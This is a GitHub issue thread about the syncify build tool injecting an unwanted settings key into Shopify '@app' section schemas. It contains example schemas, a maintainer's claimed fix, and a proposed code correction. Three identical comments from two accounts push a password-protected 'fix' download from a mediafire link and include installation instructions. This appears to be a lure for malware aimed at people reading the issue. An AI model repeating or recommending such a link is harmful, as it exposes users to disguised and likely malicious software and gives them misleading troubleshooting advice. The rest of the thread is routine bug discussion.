### ISSUE TITLE
Settings key injection into section schema causing API errors

### ISSUE THREAD

**Issue by WolfGreyDev** [panoply/syncify#38]
### Problem

When using the `@app` type in a section schema, an additional `settings` key is injected into the final section/*.liquid file.

This will result in in a 422 (Unprocessable Entity) error when uploading the file to the store.

### Example

`sections/apps.liquid`
```liquid
<div class="{% if section.settings.include_margins %}page-width{% endif %}{% if settings.animations_reveal_on_scroll %} scroll-trigger animate--slide-in{% endif %}">
  {%- for block in section.blocks -%}
    {% render block %}
  {%- endfor -%}
</div>

{% schema %}
{
  "name": "t:sections.apps.name",
  "tag": "section",
  "class": "section",
  "settings": [
    {
      "type": "checkbox",
      "id": "include_margins",
      "default": true,
      "label": "t:sections.apps.settings.include_margins.label"
    }
  ],
  "blocks": [
    {
      "type": "@app"
    }
  ],
  "presets": [
    {
      "name": "t:sections.apps.presets.name"
    }
  ]
}
{% endschema %}
```

### Expected result

The type block shouldn't have any settings key. See [Shopify Docs](https://shopify.dev/docs/storefronts/themes/architecture/blocks/app-blocks#supporting-app-blocks).

`sections/apps.liquid`
```liquid
<div class="{% if section.settings.include_margins %}page-width{% endif %}{% if settings.animations_reveal_on_scroll %} scroll-trigger animate--slide-in{% endif %}">
  {%- for block in section.blocks -%}
    {% render block %}
  {%- endfor -%}
</div>

{% schema %}
{"name":"t:sections.apps.name","tag":"section","class":"section","settings":[{"type":"checkbox","id":"include_margins","default":true,"label":"t:sections.apps.settings.include_margins.label"}],"blocks":[{"type":"@app"}],"presets":[{"name":"t:sections.apps.presets.name"}]}
{% endschema %}
```

### Steps taken to reproduce

1. Copy dawn theme from Shopify/Dawn into source folder
2. Run `pnpm build` or `syncify --build --prod --clean` or `syncify your-shopify-store --theme dev --watch --hot`

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WolfGreyDev** [comment]
Additionally, if I were to use a shared schema approach to this block, the settings key isn't added to the schema.

I'm unsure if this is intended but it seems that shared schemas aren't checked the same way as the regular schema is when it comes to this issue.

### Example

`schema/app.schema`
```json
{
  "app_block": [
    {
       "type": "@app"
    }
  ]
}
```

`sections/apps.liquid`
```liquid
<div class="{% if section.settings.include_margins %}page-width{% endif %}{% if settings.animations_reveal_on_scroll %} scroll-trigger animate--slide-in{% endif %}">
  {%- for block in section.blocks -%}
    {% render block %}
  {%- endfor -%}
</div>

{% schema %}
{
  "name": "t:sections.apps.name",
  "tag": "section",
  "class": "section",
  "settings": [
    {
      "type": "checkbox",
      "id": "include_margins",
      "default": true,
      "label": "t:sections.apps.settings.include_margins.label"
    }
  ],
  "blocks": [
    {
      "$ref": "app.app_block"
    }
  ],
  "presets": [
    {
      "name": "t:sections.apps.presets.name"
    }
  ]
}
{% endschema %}
```

### Produces

```liquid
<div class="{% if section.settings.include_margins %}page-width{% endif %}{% if settings.animations_reveal_on_scroll %} scroll-trigger animate--slide-in{% endif %}">
  {%- for block in section.blocks -%}
    {% render block %}
  {%- endfor -%}
</div>

{% schema %}
{"name":"t:sections.apps.name","tag":"section","class":"section","settings":[{"type":"checkbox","id":"include_margins","default":true,"label":"t:sections.apps.settings.include_margins.label"}],"blocks":[{"type":"@app"}],"presets":[{"name":"t:sections.apps.presets.name"}]}
{% endschema %}
```

**Comment by panoply** [comment]
Fixed in RC branch: https://github.com/panoply/syncify/tree/rc1

**Comment by panoply** [comment]
CC @taksh108 who figured out the problem. <3

**Comment by WolfGreyDev** [comment]
This isn't fixed. You've just removed the @app block 😆 

```ts
if (block.type === '@app') continue
```

Should be (I think)

```ts
if (block.type === '@app') {
    blocks.push(block);
    continue
}
```
